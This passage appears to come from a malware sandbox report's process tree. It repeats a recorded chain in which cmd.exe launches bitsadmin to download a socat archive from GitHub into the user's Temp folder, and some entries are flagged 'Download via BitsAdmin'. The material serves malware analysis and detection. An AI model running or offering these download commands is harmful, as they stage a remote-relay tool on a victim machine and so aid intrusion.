                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1288
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:980
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\Admin\AppData\Local\Temp\9jo4T7.zip"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1920
